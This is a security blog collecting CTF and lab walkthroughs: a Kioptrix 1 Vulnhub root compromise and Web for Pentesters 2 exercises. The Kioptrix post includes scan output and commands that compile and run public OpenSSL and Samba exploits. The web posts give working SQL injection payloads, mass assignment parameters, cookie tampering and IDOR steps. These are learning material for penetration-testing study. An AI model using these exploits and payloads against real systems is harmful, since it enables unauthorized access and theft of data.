Vulnhub challenge – Kioptrix 1

Back again and this time with a new goal in mind. Recently a friend of mine got his OSCP, which has now inspired me to go for mine in the near future. Until then however, I’m gonna go through CTF that are more like what I can expect in the OSCP. So a little googling and I found this blog by abatchy. The first one I’ll be tackling is the Kioptrix 1 vm . It’s an easy vm to tackle with multiple ways of getting root access. As always let’s start with some recon.


# Nmap 7.40 scan initiated Wed Aug 30 03:40:59 2017 as: nmap -sSVC -A -p- -oN nmap-scan 192.168.1.24
Nmap scan report for 192.168.1.24
Host is up (0.00022s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2017-08-30T21:41:25+00:00; +13h59m59s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:7F:18:41 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Running nmap against the machine reveals multiple ports opened, the ones we are interested in are 22,80,139,443.

SSH version seems pretty solid with no real vulnerabilities, I moved onto port 80 an apaache site. Navigated to the site revealed nothing of use, just an apache page.

Since it’s a webpage I decided to use nikto to see if it can find something.


- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.24
+ Target Hostname: 192.168.1.24
+ Target Port: 80
+ Start Time: 2017-09-06 02:20:06 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8345 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time: 2017-09-06 02:20:25 (GMT-4) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

OpenSSL and mod_ssl seem to be out of date, doing a searchsploit on openssl gave me some exploits but one in particular caught my eye,OpenFuck. Obviously it caught my eye because of the name, but looking into it, the exploit would give me root access. Heartbleed wouldn’t work for this version of openssl as you need version 1.0.1 to 1.0.1f. Copy that file into your working directory and compiling won’t work. After a bit of research it turns out you need to install some packages and edit the file which are described here . Only thing you need to change is instead of installing libssl-dev, you install libssl1.0-dev and it should work.

Now gcc -o openssl-explt 764.c -lcrypto and run the executable ./openssl-explt gives you the expected parameters which are the targe hex value given in a table below (0x6b for us), target ip and a port number.

Now we run the command ./openssl-explt 0x6b 192.168.1.24 443, let it do its thing and boom, we have root access.

 

However, the description mentioned multiple ways of getting root. So I went back through my nmap logs and saw a samba share open. Running an enum4linux scan against the machine gave me a list of users but more importantly, the version number.


Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Aug 30 04:07:55 2017

==========================
| Target Information |
==========================
Target ……….. 192.168.1.24
RID Range …….. 500-550,1000-1050
Username ……… ”
Password ……… ”
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

====================================================
| Enumerating Workgroup/Domain on 192.168.1.24 |
====================================================
[+] Got domain/workgroup name: MYGROUP

============================================
| Nbtstat Information for 192.168.1.24 |
============================================
Looking up status of 192.168.1.24
KIOPTRIX <00> – B Workstation Service
KIOPTRIX <03> – B Messenger Service
KIOPTRIX <20> – B File Server Service
..__MSBROWSE__. <01> – B Master Browser
MYGROUP <00> – B Domain/Workgroup Name
MYGROUP <1d> – B Master Browser
MYGROUP <1e> – B Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================
| Session Check on 192.168.1.24 |
=====================================
[+] Server 192.168.1.24 allows sessions using username ”, password ”

===========================================
| Getting domain SID for 192.168.1.24 |
===========================================
Domain Name: MYGROUP
Domain Sid: (NULL SID)
[+] Can’t determine if host is part of domain or part of a workgroup

======================================
| OS information on 192.168.1.24 |
======================================
[+] Got OS info for 192.168.1.24 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for 192.168.1.24 from srvinfo:
KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
platform_id : 500
os version : 4.5
server type : 0x9a03

=============================
| Users on 192.168.1.24 |
=============================

=========================================
| Share Enumeration on 192.168.1.24 |
=========================================
WARNING: The “syslog” option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

Sharename Type Comment
——— —- ——-
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)

Server Comment
——— ——-
KIOPTRIX Samba Server

Workgroup Master
——— ——-
MYGROUP KIOPTRIX
WORKGROUP READYSHARE

Again using searchsploit, I found another exploit that would give me remote code execution. Copying that again into the working directory and compiling it gcc 10.c -o smb-explt. Running ./smb-explt would spit out the parameters needed, the platform (linux in our case) and ip address. ./smb-explt -b linux -c 192.168.1.24, boom root again.

 

This VM was nice and simple, good way to get back into CTF after a bit of a break. Gonna start the second one ASAP which is going to be more of a challenge.

 

web for pentesters 2 mass assignment

For this post I’ll be going through the mass assignment examples in web for pentesters 2. Mass assignments takes advantage of how some programming frameworks allow a programmers to bind HTTP request parameters to variables. The attacker abuses this by sending request parameters to the system in hope of overwriting existing code parameters. OWASP have a great write on how it works for different languages and how to protect against it.

This walk through will show you have to exploit this flaw using a web proxy. These examples takes advantage of the mass assignment flaw found in ruby.

Example 1:

So first off load up the example page then the proxy of your choice, make sure its setup to intercept the traffic.

Then sign up as a regular user.

Once the request has been sent, go to your proxy app.

In the GET request add the parameter &user[admin]=1 after the parameters. 

Example 2:

Same as above, I think i may have done the first example a little wrong :S

 

Example 3:

This example follows the same steps as before, except instead of user[admin]=1 to get admin, you add user[company_id]=2 to gain access to company 2’s secret data.

That will be it for now, hopefully by next week I’ll have either the captcha examples done or the randomness issues example done.

 

Web for pentesters 2-Authentication

Today I’ll be going through the authentication exercise from web for pentesters 2. This exercise wasn’t to difficult, the hard part was example 2, which I’ll get into later on, but otherwise it’s pretty straight forward. So lets get into it.

Example 1:

For the first example the username is given to you, admin, however the password you have to guess. You could run a password cracker and get it or as it’s a weak password you could easily guess it. The password is admin.

Example 2:

This example was a pain to do and I still haven’t cracked it yet with the script(which is available on my bitbucket account here). However the username and password are in the ruby file for this example, username:hacker password:p4ssw0rd (zero not o).

Example 3:

In the third example you are going to need to use a proxy like burpsuite and owasp ZAP. Once you have that installed and set up, follow the steps below to cracked the exercise.

  1. Load the page. (Make sure that no parameters are in the url as this screws with the process)
  2. Load up the proxy.
  3. Find the user variable in the cookie.
  4. Make the user variable equal admin
  5. Submit the request

Boom! you are now admin.

Example 4:

Here you have to run a password cracker. Any online cracker should work, yet to run on this exercise, will update this post once I do.

Example 5:

In this example there is a flaw in the registration process. Here we can create a user with admin privileges with the following  steps:

  1. Click on the register link.
  2.  Create a user with username Admin and any password you want.

This will get you admin rights, the problem lies in the mysql database username comparison.

Example 6:

In the last example we are again exploiting the logic in the register page to get admin privileges.

  1. Go to the register page.
  2. Create a user with the username admin with a space after the username and any password.

Boom! you are now an admin XD. The problem lies again in the comparison of the new username and usernames on the database as admin and admin (with a space) are two different users on the system.

Thanks for reading, if you have any questions, comments please leave them below.

Web for pentesters 2 Authorisation

This week I’ll go over the authorisation bypass examples for web for pentesters 2. I know last week I said I would go through the authentication examples, but I wasn’t able to finish it in time ( example 2 is a pain). Without much further to do lets go through the exercise.

Example 1:

In this example, we try to bypass any authorisation by just altering the number at the end, like so:

authorization/example1/infos/1
and
authorization/example1/infos/2

This will give you direct access to the resources, even when you aren’t logged in.

Example 2:

In this example, you can access other users files by just simply incrementing through the number at the end of the url.

authorization/example2/infos/3
and
authorization/example2/infos/4
These will work, but nothing after that, you’ll get an internal server error.

Example 3:

This example is similar to the attack above, however we need to exploit it through the edit page.

First you’ll need to log in and click on any of the posts.Then change the number at the end of the url to 3. You now have access to the information from user2.

That will do it for now, in the next post I’ll hopefully have mass assignment done. Until then keep on hacking.

Web for Pentesters 2-SQL Injection

Aaaanndd I’m back, sorry for the lack of posts over the last couple of weeks, but it’s the end of the semester which means that assignments are due and exams are coming up.However, now i should be able to get back to a regular posting schedule.
So lets start with the SQL injection from web for pentesters 2. This vm carries on from web for pentesters 1 and introduces some new and
more difficult attacks.

SQLi 1:

First enter a single quote (‘) in the username field, this will produce an error
and reveal the sql command for the database:
SELECT * FROM users WHERE username=”’ AND password=”

Now we need to escape the command:
SELECT * FROM users WHERE username=’‘or 1=1 — ‘‘ AND password=”
This will escape the command print out success.

‘or 1=1 # also works.

SQLi 2:

Here we follow the same steps as SQLi 1 but also need to include the limit command like so:
‘ or 1=1 limit 1 — ‘
We use 1 because the developer has limited the number of users displayed to one.

SQLi 3:

Here is where things get a little more difficult.
Since single quotes are being escaped from user input, we need to insert a backslash () to escape.
Once we escape the command we can inject our own sql code like so:
in the username field:

in the password field:
‘or 1=1 # ‘

SQLi 4:

For this exercise we are injectiing directly into a where clause.

You can produce and error this to look at the command by simply removing everything after username.
SELECT * FROM users WHERE username=;
or put in an unknown username like admin.
Mysql2::Error: Unknown column ‘admin’ in ‘where clause’: SELECT * FROM users WHERE username=admin;

Basically you can input anything you into their to display the users.
req=password
this will display all the users in the system.

SQLi 5:

Here we inject into the url bar.

To get an error message, try putting in or 1=1.
This will produce an error and show us the sql command:
SELECT * FROM users LIMIT 3 or 1=1;
Just like the pentester labs description, we exploit this through a union select command like so:
union select * from users.
This will display the entire users table of the database.

The union command combines the output of multiple select statements.

SQLi 6:

Same procedure as above, only this time we’re exploiting the GROUP BY command instead of the LIMIT command:
to get the entire users table:
union select * from users

SQLi 7:

In this example we follow the steps shown by pentesterlab and inject this as the id parameter:
extractvalue(‘%3Cxml%3E’,concat(%22/%22,(select%20version())))

This will produce an error with the mysql version.

SQLi 8:

Now we move into attacks that are exploited later in the system.Here we have to inject our sql into the username field
and then go to the users page to see the injection work.

First create a bunch of user profiles, you don’t need to put a password.
For one of the users, use just a single quote in the username field and submit it.
Then go to the single quote user page, this will show you the error with the sql syntax.

To see the users page, click on the id of the user.

Now for the exploitation.
Inject this into the username field:
name’union select * from users where id=1 #
This should return the first users page.

SQLi 9:

Now for the last sql injection exercise.

Here the problem occurs because the application does not handle chinese characters correctly.
So all we need is a chinese character and statement that always evaluates to true like so:
脫’ or 1=1 #

Tune in next week for authentication walkthrough.